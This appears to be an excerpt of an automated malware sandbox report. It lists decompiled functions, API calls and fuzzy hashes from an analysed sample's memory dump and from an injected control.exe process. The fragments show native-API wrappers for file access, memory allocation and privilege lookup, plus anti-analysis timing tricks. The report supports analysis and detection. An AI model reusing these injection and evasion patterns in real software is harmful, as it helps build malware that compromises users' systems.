
Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839A, Relevance: 1.5, APIs: 1, Instructions: 34
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041839A(void* __eax, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t17;
				void* _t25;

				asm("aas");
				asm("gs movsd");
				_t13 = _a8;
				_t3 = _t13 + 0xc60; // 0xca0
				E00418DC0(_t25, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t17;
			}

0x0041839b
0x0041839c
0x004183a3
0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 112c43baa4388ae1ede3ff1ff833baaae1ab87f7fdc733f9df478b1d2ab2fa08
Instruction ID: bd140ea7b518ec3db17981ab1b9bb2d2098c2604c77f9ed119bb4e84343aa64d
Opcode Fuzzy Hash: 112c43baa4388ae1ede3ff1ff833baaae1ab87f7fdc733f9df478b1d2ab2fa08
Instruction Fuzzy Hash: FCF0F8B5210208ABCB14DF89DC81EEB77A9AF88754F118559FE1997241CA34E911CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182EA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004182EA(intOrPtr _a4, void* _a8) {
				char _v1;
				long _t8;
				void* _t12;

				asm("bound eax, [edx+0x7b]");
				_push( &_v1);
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t12, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182eb
0x004182f0
0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d94e900c207ba5931ea090df46204c3c3990b72febd0bc75f8f3f7104e7414c1
Instruction ID: 4cb1869d498ac70967c5b74b613c2fca17f0886bb6412ab2ce3c58ffd5aed2ae
Opcode Fuzzy Hash: d94e900c207ba5931ea090df46204c3c3990b72febd0bc75f8f3f7104e7414c1
Instruction Fuzzy Hash: 10E08C36200204ABD710EFA4DC85FE77769EF44310F14459DF9289B242CA30EA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182F0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182f3
0x004182f6
0x004182ff
0x00418307
0x00418315
0x00418319

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088B0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088bb
0x004088c3
0x004088c5
0x004088ca
0x004088cf
0x004088e2
0x004088e7
0x004088f0
0x004088fc
0x0040890f
0x00408914
0x00408917
0x00408920
0x00408932
0x00408937
0x0040893c
0x00000000
0x00000000
0x0040893e
0x00408942
0x00000000
0x00000000
0x00408944
0x00000000
0x00408942
0x00408946
0x00408949
0x0040894f
0x00408951
0x0040895c
0x00408961
0x00408964
0x00408971
0x0040897c
0x0040897e
0x00408984
0x00408988
0x0040898b
0x0040898b
0x00408992
0x00408995
0x0040899a
0x004089a7
0x004088d6
0x004088d6
0x004088d6

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409280(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418665, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 439a93e73c02f404e6d2575ab5dfc9872aed1239918caa20bd9e2b097356bfc3
Instruction ID: e299f46238ebc69ab2cc1e5b02a677cee0f6162caae95748a26315441528b21e
Opcode Fuzzy Hash: 439a93e73c02f404e6d2575ab5dfc9872aed1239918caa20bd9e2b097356bfc3
Instruction Fuzzy Hash: D6F0A7B53002046BE720DF55DC45EE777AEEF85710F068459FD4817241CE34A801C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C4, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004184C4(void* __eax, void* __ebx, void* __edx, intOrPtr __edi, void* __esi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t18;

				asm("cdq");
				asm("daa");
				 *((intOrPtr*)(__esi - 0x74aa003e)) = __edi;
				_t15 = _a4;
				_push(__esi);
				_t8 = _t15 + 0xc74; // 0xc74
				E00418DC0(__edi, _a4, _t8,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t18 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t18;
			}

0x004184c4
0x004184c7
0x004184cc
0x004184d3
0x004184d9
0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: cd3b3fcee02e06384ffc45d488cd574ff2e02852413c44d2b08398669816d729
Instruction ID: 39efac347497febf1923aa7352251c8de92ab8010066ff675043ab117096d95e
Opcode Fuzzy Hash: cd3b3fcee02e06384ffc45d488cd574ff2e02852413c44d2b08398669816d729
Instruction Fuzzy Hash: A0E06DB1600614AFDB15DF55CC45EE7BBE8EF88350F05896DF94C9B291C631E911CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041862B, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041862B(void* __eax, void* __edx, void* __edi, void* __esi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t15;

				_push(_t26);
				_t12 = _v0;
				E00418DC0(__edi, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t12 + 0xa18)), 0, 0x46);
				_t15 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t15;
			}

0x00418630
0x00418633
0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 1fc14b458841e90b53c74cdf34c07aa633e19f5a88c7edfdc363ba5696b6a2a5
Instruction ID: 63aa1c02a408c4285ad56754b1183dede23e5d2b0f320f4b0a4e2b46a13a9658
Opcode Fuzzy Hash: 1fc14b458841e90b53c74cdf34c07aa633e19f5a88c7edfdc363ba5696b6a2a5
Instruction Fuzzy Hash: 43E01AB52003196BDB24DF49DC85EEB37ADEF89650F018569FE0C5B282CA35E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00415691, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5704b43e56c0817e5bb99365b2941cb92fd6207047c0919e3617f5a5a83446b3
Instruction ID: 6b14719de03325ab59378f6f59f68f8800d09c179c5aa561198c20e144293cb0
Opcode Fuzzy Hash: 5704b43e56c0817e5bb99365b2941cb92fd6207047c0919e3617f5a5a83446b3
Instruction Fuzzy Hash: E6A0112BF0A00A002228AC08B8008B8E328C2C303AC203BABCC08B30002003CA2208CC

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exe PID: 6364 Parent PID: 3388 control.exeCOMMON

Executed Functions

Function 02ED81BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02ED3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02ED3B97,007A002E,00000000,00000060,00000000,00000000), ref: 02ED820D

Strings

.z`, xrefs: 02ED81FD, 02ED8208

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 12e327de3525901ea6c3e4c4cccab6f56d3d65d2d0a78a7e6742808d7d5c8ae8
Instruction ID: 5b7842d9968cf061e5772ef14e3bf36952606af5e788edc549d0865e29a145ed
Opcode Fuzzy Hash: 12e327de3525901ea6c3e4c4cccab6f56d3d65d2d0a78a7e6742808d7d5c8ae8
Instruction Fuzzy Hash: 1401E4B2205108AFCB08CF98CC80EEB37A9AF8C714F158248FA5D97240C631E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02ED81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02ED3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02ED3B97,007A002E,00000000,00000060,00000000,00000000), ref: 02ED820D

Strings

.z`, xrefs: 02ED81FD, 02ED8208

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: ee3bba27192a6d01eb7f094bb0eb8981f76dc1caa3afbb01b7856f568f95c8aa
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: FDF0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02ED826A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02ED3D52,5E972F59,FFFFFFFF,02ED3A11,?,?,02ED3D52,?,02ED3A11,FFFFFFFF,5E972F59,02ED3D52,?,00000000), ref: 02ED82B5

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 58dda8718b650ed48f6ca6ae8d4462445a20beaf965f10829a05570c0321db13
Instruction ID: 61a8346de0e750b349d2ac71322c7dc658b6d4f3f7044bd2950bf0d99f6dc248
Opcode Fuzzy Hash: 58dda8718b650ed48f6ca6ae8d4462445a20beaf965f10829a05570c0321db13
Instruction Fuzzy Hash: 2EF0F9B2200108AFCB14CF99DC80DEB77A9AF8C354F158248FA0DA7241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02ED3D52,5E972F59,FFFFFFFF,02ED3A11,?,?,02ED3D52,?,02ED3A11,FFFFFFFF,5E972F59,02ED3D52,?,00000000), ref: 02ED82B5

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: f0adfa3e1e5682564bcc89ce56bd909d451a9e7cf98b9a0f90d21970eab8d9e2
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: AEF0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158648FA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED839A, Relevance: 1.5, APIs: 1, Instructions: 34memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EC2D11,00002000,00003000,00000004), ref: 02ED83D9

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 639c42a3289c8abaf222961adb59f4913f46323dd7b9bbad3251bcbbf111eb37
Instruction ID: 29a09e73832c550ec373015009f088063e9ab140544b10b9622e8e1c118d1baf
Opcode Fuzzy Hash: 639c42a3289c8abaf222961adb59f4913f46323dd7b9bbad3251bcbbf111eb37
Instruction Fuzzy Hash: DEF0F8B5210208ABCB14DF88DC81EEB77ADAF88750F118559FE1997241C630E912CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02EC2D11,00002000,00003000,00000004), ref: 02ED83D9

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 64f1d883fef792da151f2c05a7823d044f2c9c0dd5e6ad7ff5c154778404bcac
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 68F015B2200208ABCB14DF89CC80EAB77ADAF8C750F118548FE0897241C630F811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED82EA, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02ED3D30,?,?,02ED3D30,00000000,FFFFFFFF), ref: 02ED8315

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9facc7c5e7f7db13436b569684f7aa9bdebd7a6d8cd577dd02810cb928bbb380
Instruction ID: 69aae03638832db914bc88c412ec4d0519dc4e2727a2821172ee1ee41d163e7d
Opcode Fuzzy Hash: 9facc7c5e7f7db13436b569684f7aa9bdebd7a6d8cd577dd02810cb928bbb380
Instruction Fuzzy Hash: B9E08C36200104ABD710EFA4CC85FA7776AEF48310F148599F9289B241C930EA01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02ED82F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02ED3D30,?,?,02ED3D30,00000000,FFFFFFFF), ref: 02ED8315

Memory Dump Source

Source File: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Offset: 02EC0000, based on PE: false
